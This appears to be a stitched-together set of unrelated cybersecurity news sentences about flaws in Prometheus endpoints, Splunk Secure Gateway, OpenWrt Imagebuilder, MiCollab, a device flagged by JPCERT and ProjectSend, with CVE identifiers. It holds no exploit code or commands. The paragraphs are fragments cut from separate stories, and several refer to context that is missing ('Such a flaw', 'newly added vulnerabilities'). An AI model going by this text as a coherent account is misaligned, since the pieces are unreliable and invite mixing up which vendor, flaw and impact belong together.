Aside from disrupting servers through a deluge of requests to "debug/pprof/heap" and other endpoints, attackers could also exploit Prometheus' "metrics" endpoint to obtain information from internal API endpoints, Docker registries, subdomains, and images that could be leveraged for reconnaissance efforts.
Updates have been issued by Splunk to address over 15 vulnerabilities impacting its products and third-party dependencies, the most serious of which is the high-severity deserialization of untrusted data bug in Secure Gateway, tracked as CVE-2024-53247.
Such a flaw, which could be exploited without authentication, stems from a command injection issue in Imagebuilder that enables arbitrary command injections in the build process and truncated SHA-256 hash collisions that allow reduced entropy that ultimately results in artifact cache compromise, according to OpenWrt.
Intrusions leveraging CVE-2024-41713, which stems from insufficient input validation in MiCollab's NuPoint Unified Messaging component, could facilitate not only unauthenticated provisioning data access but also unauthenticated admin task execution, according to an analysis from watchTowr Labs.
Most severe of the vulnerabilities is the undocumented features inclusion issue, tracked as CVE-2024-52564, which could be exploited to facilitate remote firewall deactivation, device setting manipulation, and arbitrary OS command execution, according to Japan's Computer Emergency Response Team Coordination Center.
Most severe of the newly added vulnerabilities was the critical improper authentication flaw in the open-source file sharing web app ProjectSend, tracked as CVE-2024-11680, which could be leveraged to enable malicious account creation, webshell uploads, and JavaScript embedding.
